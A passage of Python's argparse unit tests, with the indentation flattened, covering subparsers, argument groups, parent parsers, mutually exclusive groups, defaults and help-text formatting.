# create a parser with a subparsers argument
if prefix_chars:
parser = ErrorRaisingArgumentParser(
prog='PROG', description='main description', prefix_chars=prefix_chars)
parser.add_argument(
prefix_chars[0] * 2 + 'foo', action='store_true', help='foo help')
else:
parser = ErrorRaisingArgumentParser(
prog='PROG', description='main description')
parser.add_argument(
'--foo', action='store_true', help='foo help')
parser.add_argument(
'bar', type=float, help='bar help')
# check that only one subparsers argument can be added
subparsers = parser.add_subparsers(help='command help')
self.assertArgumentParserError(parser.add_subparsers)
# add first sub-parser
parser1_kwargs = dict(description='1 description')
if subparser_help:
parser1_kwargs['help'] = '1 help'
parser1 = subparsers.add_parser('1', **parser1_kwargs)
parser1.add_argument('-w', type=int, help='w help')
parser1.add_argument('x', choices='abc', help='x help')
# add second sub-parser
parser2_kwargs = dict(description='2 description')
if subparser_help:
parser2_kwargs['help'] = '2 help'
parser2 = subparsers.add_parser('2', **parser2_kwargs)
parser2.add_argument('-y', choices='123', help='y help')
parser2.add_argument('z', type=complex, nargs='*', help='z help')
# return the main parser
return parser
def setUp(self):
super(TestAddSubparsers, self).setUp()
self.parser = self._get_parser()
self.command_help_parser = self._get_parser(subparser_help=True)
def test_parse_args_failures(self):
# check some failure cases:
for args_str in ['', 'a', 'a a', '0.5 a', '0.5 1',
'0.5 1 -y', '0.5 2 -w']:
args = args_str.split()
self.assertArgumentParserError(self.parser.parse_args, args)
def test_parse_args(self):
# check some non-failure cases:
self.assertEqual(
self.parser.parse_args('0.5 1 b -w 7'.split()),
NS(foo=False, bar=0.5, w=7, x='b'),
)
self.assertEqual(
self.parser.parse_args('0.25 --foo 2 -y 2 3j -- -1j'.split()),
NS(foo=True, bar=0.25, y='2', z=[3j, -1j]),
)
self.assertEqual(
self.parser.parse_args('--foo 0.125 1 c'.split()),
NS(foo=True, bar=0.125, w=None, x='c'),
)
def test_parse_known_args(self):
self.assertEqual(
self.parser.parse_known_args('0.5 1 b -w 7'.split()),
(NS(foo=False, bar=0.5, w=7, x='b'), []),
)
self.assertEqual(
self.parser.parse_known_args('0.5 -p 1 b -w 7'.split()),
(NS(foo=False, bar=0.5, w=7, x='b'), ['-p']),
)
self.assertEqual(
self.parser.parse_known_args('0.5 1 b -w 7 -p'.split()),
(NS(foo=False, bar=0.5, w=7, x='b'), ['-p']),
)
self.assertEqual(
self.parser.parse_known_args('0.5 1 b -q -rs -w 7'.split()),
(NS(foo=False, bar=0.5, w=7, x='b'), ['-q', '-rs']),
)
self.assertEqual(
self.parser.parse_known_args('0.5 -W 1 b -X Y -w 7 Z'.split()),
(NS(foo=False, bar=0.5, w=7, x='b'), ['-W', '-X', 'Y', 'Z']),
)
def test_dest(self):
parser = ErrorRaisingArgumentParser()
parser.add_argument('--foo', action='store_true')
subparsers = parser.add_subparsers(dest='bar')
parser1 = subparsers.add_parser('1')
parser1.add_argument('baz')
self.assertEqual(NS(foo=False, bar='1', baz='2'),
parser.parse_args('1 2'.split()))
def test_help(self):
self.assertEqual(self.parser.format_usage(),
'usage: PROG [-h] [--foo] bar {1,2} ...\n')
self.assertEqual(self.parser.format_help(), textwrap.dedent('''\
usage: PROG [-h] [--foo] bar {1,2} ...
main description
positional arguments:
bar bar help
{1,2} command help
optional arguments:
-h, --help show this help message and exit
--foo foo help
'''))
def test_help_extra_prefix_chars(self):
# Make sure - is still used for help if it is a non-first prefix char
parser = self._get_parser(prefix_chars='+:-')
self.assertEqual(parser.format_usage(),
'usage: PROG [-h] [++foo] bar {1,2} ...\n')
self.assertEqual(parser.format_help(), textwrap.dedent('''\
usage: PROG [-h] [++foo] bar {1,2} ...
main description
positional arguments:
bar bar help
{1,2} command help
optional arguments:
-h, --help show this help message and exit
++foo foo help
'''))
def test_help_alternate_prefix_chars(self):
parser = self._get_parser(prefix_chars='+:/')
self.assertEqual(parser.format_usage(),
'usage: PROG [+h] [++foo] bar {1,2} ...\n')
self.assertEqual(parser.format_help(), textwrap.dedent('''\
usage: PROG [+h] [++foo] bar {1,2} ...
main description
positional arguments:
bar bar help
{1,2} command help
optional arguments:
+h, ++help show this help message and exit
++foo foo help
'''))
def test_parser_command_help(self):
self.assertEqual(self.command_help_parser.format_usage(),
'usage: PROG [-h] [--foo] bar {1,2} ...\n')
self.assertEqual(self.command_help_parser.format_help(),
textwrap.dedent('''\
usage: PROG [-h] [--foo] bar {1,2} ...
main description
positional arguments:
bar bar help
{1,2} command help
1 1 help
2 2 help
optional arguments:
-h, --help show this help message and exit
--foo foo help
'''))
def test_subparser_title_help(self):
parser = ErrorRaisingArgumentParser(prog='PROG',
description='main description')
parser.add_argument('--foo', action='store_true', help='foo help')
parser.add_argument('bar', help='bar help')
subparsers = parser.add_subparsers(title='subcommands',
description='command help',
help='additional text')
parser1 = subparsers.add_parser('1')
parser2 = subparsers.add_parser('2')
self.assertEqual(parser.format_usage(),
'usage: PROG [-h] [--foo] bar {1,2} ...\n')
self.assertEqual(parser.format_help(), textwrap.dedent('''\
usage: PROG [-h] [--foo] bar {1,2} ...
main description
positional arguments:
bar bar help
optional arguments:
-h, --help show this help message and exit
--foo foo help
subcommands:
command help
{1,2} additional text
'''))
def _test_subparser_help(self, args_str, expected_help):
try:
self.parser.parse_args(args_str.split())
except ArgumentParserError:
err = sys.exc_info()[1]
if err.stdout != expected_help:
print(repr(expected_help))
print(repr(err.stdout))
self.assertEqual(err.stdout, expected_help)
def test_subparser1_help(self):
self._test_subparser_help('5.0 1 -h', textwrap.dedent('''\
usage: PROG bar 1 [-h] [-w W] {a,b,c}
1 description
positional arguments:
{a,b,c} x help
optional arguments:
-h, --help show this help message and exit
-w W w help
'''))
def test_subparser2_help(self):
self._test_subparser_help('5.0 2 -h', textwrap.dedent('''\
usage: PROG bar 2 [-h] [-y {1,2,3}] [z [z ...]]
2 description
positional arguments:
z z help
optional arguments:
-h, --help show this help message and exit
-y {1,2,3} y help
'''))
# ============
# Groups tests
# ============
class TestPositionalsGroups(TestCase):
"""Tests that order of group positionals matches construction order"""
def test_nongroup_first(self):
parser = ErrorRaisingArgumentParser()
parser.add_argument('foo')
group = parser.add_argument_group('g')
group.add_argument('bar')
parser.add_argument('baz')
expected = NS(foo='1', bar='2', baz='3')
result = parser.parse_args('1 2 3'.split())
self.assertEqual(expected, result)
def test_group_first(self):
parser = ErrorRaisingArgumentParser()
group = parser.add_argument_group('xxx')
group.add_argument('foo')
parser.add_argument('bar')
parser.add_argument('baz')
expected = NS(foo='1', bar='2', baz='3')
result = parser.parse_args('1 2 3'.split())
self.assertEqual(expected, result)
def test_interleaved_groups(self):
parser = ErrorRaisingArgumentParser()
group = parser.add_argument_group('xxx')
parser.add_argument('foo')
group.add_argument('bar')
parser.add_argument('baz')
group = parser.add_argument_group('yyy')
group.add_argument('frell')
expected = NS(foo='1', bar='2', baz='3', frell='4')
result = parser.parse_args('1 2 3 4'.split())
self.assertEqual(expected, result)
# ===================
# Parent parser tests
# ===================
class TestParentParsers(TestCase):
"""Tests that parsers can be created with parent parsers"""
def assertArgumentParserError(self, *args, **kwargs):
self.assertRaises(ArgumentParserError, *args, **kwargs)
def setUp(self):
super(TestParentParsers, self).setUp()
self.wxyz_parent = ErrorRaisingArgumentParser(add_help=False)
self.wxyz_parent.add_argument('--w')
x_group = self.wxyz_parent.add_argument_group('x')
x_group.add_argument('-y')
self.wxyz_parent.add_argument('z')
self.abcd_parent = ErrorRaisingArgumentParser(add_help=False)
self.abcd_parent.add_argument('a')
self.abcd_parent.add_argument('-b')
c_group = self.abcd_parent.add_argument_group('c')
c_group.add_argument('--d')
self.w_parent = ErrorRaisingArgumentParser(add_help=False)
self.w_parent.add_argument('--w')
self.z_parent = ErrorRaisingArgumentParser(add_help=False)
self.z_parent.add_argument('z')
# parents with mutually exclusive groups
self.ab_mutex_parent = ErrorRaisingArgumentParser(add_help=False)
group = self.ab_mutex_parent.add_mutually_exclusive_group()
group.add_argument('-a', action='store_true')
group.add_argument('-b', action='store_true')
self.main_program = os.path.basename(sys.argv[0])
def test_single_parent(self):
parser = ErrorRaisingArgumentParser(parents=[self.wxyz_parent])
self.assertEqual(parser.parse_args('-y 1 2 --w 3'.split()),
NS(w='3', y='1', z='2'))
def test_single_parent_mutex(self):
self._test_mutex_ab(self.ab_mutex_parent.parse_args)
parser = ErrorRaisingArgumentParser(parents=[self.ab_mutex_parent])
self._test_mutex_ab(parser.parse_args)
def test_single_granparent_mutex(self):
parents = [self.ab_mutex_parent]
parser = ErrorRaisingArgumentParser(add_help=False, parents=parents)
parser = ErrorRaisingArgumentParser(parents=[parser])
self._test_mutex_ab(parser.parse_args)
def _test_mutex_ab(self, parse_args):
self.assertEqual(parse_args([]), NS(a=False, b=False))
self.assertEqual(parse_args(['-a']), NS(a=True, b=False))
self.assertEqual(parse_args(['-b']), NS(a=False, b=True))
self.assertArgumentParserError(parse_args, ['-a', '-b'])
self.assertArgumentParserError(parse_args, ['-b', '-a'])
self.assertArgumentParserError(parse_args, ['-c'])
self.assertArgumentParserError(parse_args, ['-a', '-c'])
self.assertArgumentParserError(parse_args, ['-b', '-c'])
def test_multiple_parents(self):
parents = [self.abcd_parent, self.wxyz_parent]
parser = ErrorRaisingArgumentParser(parents=parents)
self.assertEqual(parser.parse_args('--d 1 --w 2 3 4'.split()),
NS(a='3', b=None, d='1', w='2', y=None, z='4'))
def test_multiple_parents_mutex(self):
parents = [self.ab_mutex_parent, self.wxyz_parent]
parser = ErrorRaisingArgumentParser(parents=parents)
self.assertEqual(parser.parse_args('-a --w 2 3'.split()),
NS(a=True, b=False, w='2', y=None, z='3'))
self.assertArgumentParserError(
parser.parse_args, '-a --w 2 3 -b'.split())
self.assertArgumentParserError(
parser.parse_args, '-a -b --w 2 3'.split())
def test_conflicting_parents(self):
self.assertRaises(
argparse.ArgumentError,
argparse.ArgumentParser,
parents=[self.w_parent, self.wxyz_parent])
def test_conflicting_parents_mutex(self):
self.assertRaises(
argparse.ArgumentError,
argparse.ArgumentParser,
parents=[self.abcd_parent, self.ab_mutex_parent])
def test_same_argument_name_parents(self):
parents = [self.wxyz_parent, self.z_parent]
parser = ErrorRaisingArgumentParser(parents=parents)
self.assertEqual(parser.parse_args('1 2'.split()),
NS(w=None, y=None, z='2'))
def test_subparser_parents(self):
parser = ErrorRaisingArgumentParser()
subparsers = parser.add_subparsers()
abcde_parser = subparsers.add_parser('bar', parents=[self.abcd_parent])
abcde_parser.add_argument('e')
self.assertEqual(parser.parse_args('bar -b 1 --d 2 3 4'.split()),
NS(a='3', b='1', d='2', e='4'))
def test_subparser_parents_mutex(self):
parser = ErrorRaisingArgumentParser()
subparsers = parser.add_subparsers()
parents = [self.ab_mutex_parent]
abc_parser = subparsers.add_parser('foo', parents=parents)
c_group = abc_parser.add_argument_group('c_group')
c_group.add_argument('c')
parents = [self.wxyz_parent, self.ab_mutex_parent]
wxyzabe_parser = subparsers.add_parser('bar', parents=parents)
wxyzabe_parser.add_argument('e')
self.assertEqual(parser.parse_args('foo -a 4'.split()),
NS(a=True, b=False, c='4'))
self.assertEqual(parser.parse_args('bar -b --w 2 3 4'.split()),
NS(a=False, b=True, w='2', y=None, z='3', e='4'))
self.assertArgumentParserError(
parser.parse_args, 'foo -a -b 4'.split())
self.assertArgumentParserError(
parser.parse_args, 'bar -b -a 4'.split())
def test_parent_help(self):
parents = [self.abcd_parent, self.wxyz_parent]
parser = ErrorRaisingArgumentParser(parents=parents)
parser_help = parser.format_help()
progname = self.main_program
self.assertEqual(parser_help, textwrap.dedent('''\
usage: {}{}[-h] [-b B] [--d D] [--w W] [-y Y] a z
positional arguments:
a
z
optional arguments:
-h, --help show this help message and exit
-b B
--w W
c:
--d D
x:
-y Y
'''.format(progname, ' ' if progname else '' )))
def test_groups_parents(self):
parent = ErrorRaisingArgumentParser(add_help=False)
g = parent.add_argument_group(title='g', description='gd')
g.add_argument('-w')
g.add_argument('-x')
m = parent.add_mutually_exclusive_group()
m.add_argument('-y')
m.add_argument('-z')
parser = ErrorRaisingArgumentParser(parents=[parent])
self.assertRaises(ArgumentParserError, parser.parse_args,
['-y', 'Y', '-z', 'Z'])
parser_help = parser.format_help()
progname = self.main_program
self.assertEqual(parser_help, textwrap.dedent('''\
usage: {}{}[-h] [-w W] [-x X] [-y Y | -z Z]
optional arguments:
-h, --help show this help message and exit
-y Y
-z Z
g:
gd
-w W
-x X
'''.format(progname, ' ' if progname else '' )))
# ==============================
# Mutually exclusive group tests
# ==============================
class TestMutuallyExclusiveGroupErrors(TestCase):
def test_invalid_add_argument_group(self):
parser = ErrorRaisingArgumentParser()
raises = self.assertRaises
raises(TypeError, parser.add_mutually_exclusive_group, title='foo')
def test_invalid_add_argument(self):
parser = ErrorRaisingArgumentParser()
group = parser.add_mutually_exclusive_group()
add_argument = group.add_argument
raises = self.assertRaises
raises(ValueError, add_argument, '--foo', required=True)
raises(ValueError, add_argument, 'bar')
raises(ValueError, add_argument, 'bar', nargs='+')
raises(ValueError, add_argument, 'bar', nargs=1)
raises(ValueError, add_argument, 'bar', nargs=argparse.PARSER)
def test_help(self):
parser = ErrorRaisingArgumentParser(prog='PROG')
group1 = parser.add_mutually_exclusive_group()
group1.add_argument('--foo', action='store_true')
group1.add_argument('--bar', action='store_false')
group2 = parser.add_mutually_exclusive_group()
group2.add_argument('--soup', action='store_true')
group2.add_argument('--nuts', action='store_false')
expected = '''\
usage: PROG [-h] [--foo | --bar] [--soup | --nuts]
optional arguments:
-h, --help show this help message and exit
--foo
--bar
--soup
--nuts
'''
self.assertEqual(parser.format_help(), textwrap.dedent(expected))
class MEMixin(object):
def test_failures_when_not_required(self):
parse_args = self.get_parser(required=False).parse_args
error = ArgumentParserError
for args_string in self.failures:
self.assertRaises(error, parse_args, args_string.split())
def test_failures_when_required(self):
parse_args = self.get_parser(required=True).parse_args
error = ArgumentParserError
for args_string in self.failures + ['']:
self.assertRaises(error, parse_args, args_string.split())
def test_successes_when_not_required(self):
parse_args = self.get_parser(required=False).parse_args
successes = self.successes + self.successes_when_not_required
for args_string, expected_ns in successes:
actual_ns = parse_args(args_string.split())
self.assertEqual(actual_ns, expected_ns)
def test_successes_when_required(self):
parse_args = self.get_parser(required=True).parse_args
for args_string, expected_ns in self.successes:
actual_ns = parse_args(args_string.split())
self.assertEqual(actual_ns, expected_ns)
def test_usage_when_not_required(self):
format_usage = self.get_parser(required=False).format_usage
expected_usage = self.usage_when_not_required
self.assertEqual(format_usage(), textwrap.dedent(expected_usage))
def test_usage_when_required(self):
format_usage = self.get_parser(required=True).format_usage
expected_usage = self.usage_when_required
self.assertEqual(format_usage(), textwrap.dedent(expected_usage))
def test_help_when_not_required(self):
format_help = self.get_parser(required=False).format_help
help = self.usage_when_not_required + self.help
self.assertEqual(format_help(), textwrap.dedent(help))
def test_help_when_required(self):
format_help = self.get_parser(required=True).format_help
help = self.usage_when_required + self.help
self.assertEqual(format_help(), textwrap.dedent(help))
class TestMutuallyExclusiveSimple(MEMixin, TestCase):
def get_parser(self, required=None):
parser = ErrorRaisingArgumentParser(prog='PROG')
group = parser.add_mutually_exclusive_group(required=required)
group.add_argument('--bar', help='bar help')
group.add_argument('--baz', nargs='?', const='Z', help='baz help')
return parser
failures = ['--bar X --baz Y', '--bar X --baz']
successes = [
('--bar X', NS(bar='X', baz=None)),
('--bar X --bar Z', NS(bar='Z', baz=None)),
('--baz Y', NS(bar=None, baz='Y')),
('--baz', NS(bar=None, baz='Z')),
]
successes_when_not_required = [
('', NS(bar=None, baz=None)),
]
usage_when_not_required = '''\
usage: PROG [-h] [--bar BAR | --baz [BAZ]]
'''
usage_when_required = '''\
usage: PROG [-h] (--bar BAR | --baz [BAZ])
'''
help = '''\
optional arguments:
-h, --help show this help message and exit
--bar BAR bar help
--baz [BAZ] baz help
'''
class TestMutuallyExclusiveLong(MEMixin, TestCase):
def get_parser(self, required=None):
parser = ErrorRaisingArgumentParser(prog='PROG')
parser.add_argument('--abcde', help='abcde help')
parser.add_argument('--fghij', help='fghij help')
group = parser.add_mutually_exclusive_group(required=required)
group.add_argument('--klmno', help='klmno help')
group.add_argument('--pqrst', help='pqrst help')
return parser
failures = ['--klmno X --pqrst Y']
successes = [
('--klmno X', NS(abcde=None, fghij=None, klmno='X', pqrst=None)),
('--abcde Y --klmno X',
NS(abcde='Y', fghij=None, klmno='X', pqrst=None)),
('--pqrst X', NS(abcde=None, fghij=None, klmno=None, pqrst='X')),
('--pqrst X --fghij Y',
NS(abcde=None, fghij='Y', klmno=None, pqrst='X')),
]
successes_when_not_required = [
('', NS(abcde=None, fghij=None, klmno=None, pqrst=None)),
]
usage_when_not_required = '''\
usage: PROG [-h] [--abcde ABCDE] [--fghij FGHIJ]
[--klmno KLMNO | --pqrst PQRST]
'''
usage_when_required = '''\
usage: PROG [-h] [--abcde ABCDE] [--fghij FGHIJ]
(--klmno KLMNO | --pqrst PQRST)
'''
help = '''\
optional arguments:
-h, --help show this help message and exit
--abcde ABCDE abcde help
--fghij FGHIJ fghij help
--klmno KLMNO klmno help
--pqrst PQRST pqrst help
'''
class TestMutuallyExclusiveFirstSuppressed(MEMixin, TestCase):
def get_parser(self, required):
parser = ErrorRaisingArgumentParser(prog='PROG')
group = parser.add_mutually_exclusive_group(required=required)
group.add_argument('-x', help=argparse.SUPPRESS)
group.add_argument('-y', action='store_false', help='y help')
return parser
failures = ['-x X -y']
successes = [
('-x X', NS(x='X', y=True)),
('-x X -x Y', NS(x='Y', y=True)),
('-y', NS(x=None, y=False)),
]
successes_when_not_required = [
('', NS(x=None, y=True)),
]
usage_when_not_required = '''\
usage: PROG [-h] [-y]
'''
usage_when_required = '''\
usage: PROG [-h] -y
'''
help = '''\
optional arguments:
-h, --help show this help message and exit
-y y help
'''
class TestMutuallyExclusiveManySuppressed(MEMixin, TestCase):
def get_parser(self, required):
parser = ErrorRaisingArgumentParser(prog='PROG')
group = parser.add_mutually_exclusive_group(required=required)
add = group.add_argument
add('--spam', action='store_true', help=argparse.SUPPRESS)
add('--badger', action='store_false', help=argparse.SUPPRESS)
add('--bladder', help=argparse.SUPPRESS)
return parser
failures = [
'--spam --badger',
'--badger --bladder B',
'--bladder B --spam',
]
successes = [
('--spam', NS(spam=True, badger=True, bladder=None)),
('--badger', NS(spam=False, badger=False, bladder=None)),
('--bladder B', NS(spam=False, badger=True, bladder='B')),
('--spam --spam', NS(spam=True, badger=True, bladder=None)),
]
successes_when_not_required = [
('', NS(spam=False, badger=True, bladder=None)),
]
usage_when_required = usage_when_not_required = '''\
usage: PROG [-h]
'''
help = '''\
optional arguments:
-h, --help show this help message and exit
'''
class TestMutuallyExclusiveOptionalAndPositional(MEMixin, TestCase):
def get_parser(self, required):
parser = ErrorRaisingArgumentParser(prog='PROG')
group = parser.add_mutually_exclusive_group(required=required)
group.add_argument('--foo', action='store_true', help='FOO')
group.add_argument('--spam', help='SPAM')
group.add_argument('badger', nargs='*', default='X', help='BADGER')
return parser
failures = [
'--foo --spam S',
'--spam S X',
'X --foo',
'X Y Z --spam S',
'--foo X Y',
]
successes = [
('--foo', NS(foo=True, spam=None, badger='X')),
('--spam S', NS(foo=False, spam='S', badger='X')),
('X', NS(foo=False, spam=None, badger=['X'])),
('X Y Z', NS(foo=False, spam=None, badger=['X', 'Y', 'Z'])),
]
successes_when_not_required = [
('', NS(foo=False, spam=None, badger='X')),
]
usage_when_not_required = '''\
usage: PROG [-h] [--foo | --spam SPAM | badger [badger ...]]
'''
usage_when_required = '''\
usage: PROG [-h] (--foo | --spam SPAM | badger [badger ...])
'''
help = '''\
positional arguments:
badger BADGER
optional arguments:
-h, --help show this help message and exit
--foo FOO
--spam SPAM SPAM
'''
class TestMutuallyExclusiveOptionalsMixed(MEMixin, TestCase):
def get_parser(self, required):
parser = ErrorRaisingArgumentParser(prog='PROG')
parser.add_argument('-x', action='store_true', help='x help')
group = parser.add_mutually_exclusive_group(required=required)
group.add_argument('-a', action='store_true', help='a help')
group.add_argument('-b', action='store_true', help='b help')
parser.add_argument('-y', action='store_true', help='y help')
group.add_argument('-c', action='store_true', help='c help')
return parser
failures = ['-a -b', '-b -c', '-a -c', '-a -b -c']
successes = [
('-a', NS(a=True, b=False, c=False, x=False, y=False)),
('-b', NS(a=False, b=True, c=False, x=False, y=False)),
('-c', NS(a=False, b=False, c=True, x=False, y=False)),
('-a -x', NS(a=True, b=False, c=False, x=True, y=False)),
('-y -b', NS(a=False, b=True, c=False, x=False, y=True)),
('-x -y -c', NS(a=False, b=False, c=True, x=True, y=True)),
]
successes_when_not_required = [
('', NS(a=False, b=False, c=False, x=False, y=False)),
('-x', NS(a=False, b=False, c=False, x=True, y=False)),
('-y', NS(a=False, b=False, c=False, x=False, y=True)),
]
usage_when_required = usage_when_not_required = '''\
usage: PROG [-h] [-x] [-a] [-b] [-y] [-c]
'''
help = '''\
optional arguments:
-h, --help show this help message and exit
-x x help
-a a help
-b b help
-y y help
-c c help
'''
class TestMutuallyExclusiveInGroup(MEMixin, TestCase):
def get_parser(self, required=None):
parser = ErrorRaisingArgumentParser(prog='PROG')
titled_group = parser.add_argument_group(
title='Titled group', description='Group description')
mutex_group = \
titled_group.add_mutually_exclusive_group(required=required)
mutex_group.add_argument('--bar', help='bar help')
mutex_group.add_argument('--baz', help='baz help')
return parser
failures = ['--bar X --baz Y', '--baz X --bar Y']
successes = [
('--bar X', NS(bar='X', baz=None)),
('--baz Y', NS(bar=None, baz='Y')),
]
successes_when_not_required = [
('', NS(bar=None, baz=None)),
]
usage_when_not_required = '''\
usage: PROG [-h] [--bar BAR | --baz BAZ]
'''
usage_when_required = '''\
usage: PROG [-h] (--bar BAR | --baz BAZ)
'''
help = '''\
optional arguments:
-h, --help show this help message and exit
Titled group:
Group description
--bar BAR bar help
--baz BAZ baz help
'''
class TestMutuallyExclusiveOptionalsAndPositionalsMixed(MEMixin, TestCase):
def get_parser(self, required):
parser = ErrorRaisingArgumentParser(prog='PROG')
parser.add_argument('x', help='x help')
parser.add_argument('-y', action='store_true', help='y help')
group = parser.add_mutually_exclusive_group(required=required)
group.add_argument('a', nargs='?', help='a help')
group.add_argument('-b', action='store_true', help='b help')
group.add_argument('-c', action='store_true', help='c help')
return parser
failures = ['X A -b', '-b -c', '-c X A']
successes = [
('X A', NS(a='A', b=False, c=False, x='X', y=False)),
('X -b', NS(a=None, b=True, c=False, x='X', y=False)),
('X -c', NS(a=None, b=False, c=True, x='X', y=False)),
('X A -y', NS(a='A', b=False, c=False, x='X', y=True)),
('X -y -b', NS(a=None, b=True, c=False, x='X', y=True)),
]
successes_when_not_required = [
('X', NS(a=None, b=False, c=False, x='X', y=False)),
('X -y', NS(a=None, b=False, c=False, x='X', y=True)),
]
usage_when_required = usage_when_not_required = '''\
usage: PROG [-h] [-y] [-b] [-c] x [a]
'''
help = '''\
positional arguments:
x x help
a a help
optional arguments:
-h, --help show this help message and exit
-y y help
-b b help
-c c help
'''
# =================================================
# Mutually exclusive group in parent parser tests
# =================================================
class MEPBase(object):
def get_parser(self, required=None):
parent = super(MEPBase, self).get_parser(required=required)
parser = ErrorRaisingArgumentParser(
prog=parent.prog, add_help=False, parents=[parent])
return parser
class TestMutuallyExclusiveGroupErrorsParent(
MEPBase, TestMutuallyExclusiveGroupErrors):
pass
class TestMutuallyExclusiveSimpleParent(
MEPBase, TestMutuallyExclusiveSimple):
pass
class TestMutuallyExclusiveLongParent(
MEPBase, TestMutuallyExclusiveLong):
pass
class TestMutuallyExclusiveFirstSuppressedParent(
MEPBase, TestMutuallyExclusiveFirstSuppressed):
pass
class TestMutuallyExclusiveManySuppressedParent(
MEPBase, TestMutuallyExclusiveManySuppressed):
pass
class TestMutuallyExclusiveOptionalAndPositionalParent(
MEPBase, TestMutuallyExclusiveOptionalAndPositional):
pass
class TestMutuallyExclusiveOptionalsMixedParent(
MEPBase, TestMutuallyExclusiveOptionalsMixed):
pass
class TestMutuallyExclusiveOptionalsAndPositionalsMixedParent(
MEPBase, TestMutuallyExclusiveOptionalsAndPositionalsMixed):
pass
# =================
# Set default tests
# =================
class TestSetDefaults(TestCase):
def test_set_defaults_no_args(self):
parser = ErrorRaisingArgumentParser()
parser.set_defaults(x='foo')
parser.set_defaults(y='bar', z=1)
self.assertEqual(NS(x='foo', y='bar', z=1),
parser.parse_args([]))
self.assertEqual(NS(x='foo', y='bar', z=1),
parser.parse_args([], NS()))
self.assertEqual(NS(x='baz', y='bar', z=1),
parser.parse_args([], NS(x='baz')))
self.assertEqual(NS(x='baz', y='bar', z=2),
parser.parse_args([], NS(x='baz', z=2)))
def test_set_defaults_with_args(self):
parser = ErrorRaisingArgumentParser()
parser.set_defaults(x='foo', y='bar')
parser.add_argument('-x', default='xfoox')
self.assertEqual(NS(x='xfoox', y='bar'),
parser.parse_args([]))
self.assertEqual(NS(x='xfoox', y='bar'),
parser.parse_args([], NS()))
self.assertEqual(NS(x='baz', y='bar'),
parser.parse_args([], NS(x='baz')))
self.assertEqual(NS(x='1', y='bar'),
parser.parse_args('-x 1'.split()))
self.assertEqual(NS(x='1', y='bar'),
parser.parse_args('-x 1'.split(), NS()))
self.assertEqual(NS(x='1', y='bar'),
parser.parse_args('-x 1'.split(), NS(x='baz')))
def test_set_defaults_subparsers(self):
parser = ErrorRaisingArgumentParser()
parser.set_defaults(x='foo')
subparsers = parser.add_subparsers()
parser_a = subparsers.add_parser('a')
parser_a.set_defaults(y='bar')
self.assertEqual(NS(x='foo', y='bar'),
parser.parse_args('a'.split()))
def test_set_defaults_parents(self):
parent = ErrorRaisingArgumentParser(add_help=False)
parent.set_defaults(x='foo')
parser = ErrorRaisingArgumentParser(parents=[parent])
self.assertEqual(NS(x='foo'), parser.parse_args([]))
def test_set_defaults_same_as_add_argument(self):
parser = ErrorRaisingArgumentParser()
parser.set_defaults(w='W', x='X', y='Y', z='Z')
parser.add_argument('-w')
parser.add_argument('-x', default='XX')
parser.add_argument('y', nargs='?')
parser.add_argument('z', nargs='?', default='ZZ')
# defaults set previously
self.assertEqual(NS(w='W', x='XX', y='Y', z='ZZ'),
parser.parse_args([]))
# reset defaults
parser.set_defaults(w='WW', x='X', y='YY', z='Z')
self.assertEqual(NS(w='WW', x='X', y='YY', z='Z'),
parser.parse_args([]))
def test_set_defaults_same_as_add_argument_group(self):
parser = ErrorRaisingArgumentParser()
parser.set_defaults(w='W', x='X', y='Y', z='Z')
group = parser.add_argument_group('foo')
group.add_argument('-w')
group.add_argument('-x', default='XX')
group.add_argument('y', nargs='?')
group.add_argument('z', nargs='?', default='ZZ')
# defaults set previously
self.assertEqual(NS(w='W', x='XX', y='Y', z='ZZ'),
parser.parse_args([]))
# reset defaults
parser.set_defaults(w='WW', x='X', y='YY', z='Z')
self.assertEqual(NS(w='WW', x='X', y='YY', z='Z'),
parser.parse_args([]))
# =================
# Get default tests
# =================
class TestGetDefault(TestCase):
def test_get_default(self):
parser = ErrorRaisingArgumentParser()
self.assertEqual(None, parser.get_default("foo"))
self.assertEqual(None, parser.get_default("bar"))
parser.add_argument("--foo")
self.assertEqual(None, parser.get_default("foo"))
self.assertEqual(None, parser.get_default("bar"))
parser.add_argument("--bar", type=int, default=42)
self.assertEqual(None, parser.get_default("foo"))
self.assertEqual(42, parser.get_default("bar"))
parser.set_defaults(foo="badger")
self.assertEqual("badger", parser.get_default("foo"))
self.assertEqual(42, parser.get_default("bar"))
# ==========================
# Namespace 'contains' tests
# ==========================
class TestNamespaceContainsSimple(TestCase):
def test_empty(self):
ns = argparse.Namespace()
self.assertEqual('' in ns, False)
self.assertEqual('' not in ns, True)
self.assertEqual('x' in ns, False)
def test_non_empty(self):
ns = argparse.Namespace(x=1, y=2)
self.assertEqual('x' in ns, True)
self.assertEqual('x' not in ns, False)
self.assertEqual('y' in ns, True)
self.assertEqual('' in ns, False)
self.assertEqual('xx' in ns, False)
self.assertEqual('z' in ns, False)
# =====================
# Help formatting tests
# =====================
class TestHelpFormattingMetaclass(type):
def __init__(cls, name, bases, bodydict):
if name == 'HelpTestCase':
return
class AddTests(object):
def __init__(self, test_class, func_suffix, std_name):
self.func_suffix = func_suffix
self.std_name = std_name
for test_func in [self.test_format,
self.test_print,
self.test_print_file]:
test_name = '%s_%s' % (test_func.__name__, func_suffix)
def test_wrapper(self, test_func=test_func):
test_func(self)
try:
test_wrapper.__name__ = test_name
except TypeError:
pass
setattr(test_class, test_name, test_wrapper)
def _get_parser(self, tester):
parser = argparse.ArgumentParser(
*tester.parser_signature.args,
**tester.parser_signature.kwargs)
for argument_sig in getattr(tester, 'argument_signatures', []):
parser.add_argument(*argument_sig.args,
**argument_sig.kwargs)
group_sigs = getattr(tester, 'argument_group_signatures', [])
for group_sig, argument_sigs in group_sigs:
group = parser.add_argument_group(*group_sig.args,
**group_sig.kwargs)
for argument_sig in argument_sigs:
group.add_argument(*argument_sig.args,
**argument_sig.kwargs)
subparsers_sigs = getattr(tester, 'subparsers_signatures', [])
if subparsers_sigs:
subparsers = parser.add_subparsers()
for subparser_sig in subparsers_sigs:
subparsers.add_parser(*subparser_sig.args,
**subparser_sig.kwargs)
return parser
def _test(self, tester, parser_text):
expected_text = getattr(tester, self.func_suffix)
expected_text = textwrap.dedent(expected_text)
if expected_text != parser_text:
print(repr(expected_text))
print(repr(parser_text))
for char1, char2 in zip(expected_text, parser_text):
if char1 != char2:
print('first diff: %r %r' % (char1, char2))
break
tester.assertEqual(expected_text, parser_text)
def test_format(self, tester):
parser = self._get_parser(tester)
format = getattr(parser, 'format_%s' % self.func_suffix)
self._test(tester, format())
def test_print(self, tester):
parser = self._get_parser(tester)
print_ = getattr(parser, 'print_%s' % self.func_suffix)
old_stream = getattr(sys, self.std_name)
setattr(sys, self.std_name, StdIOBuffer())
try:
print_()
parser_text = getattr(sys, self.std_name).getvalue()
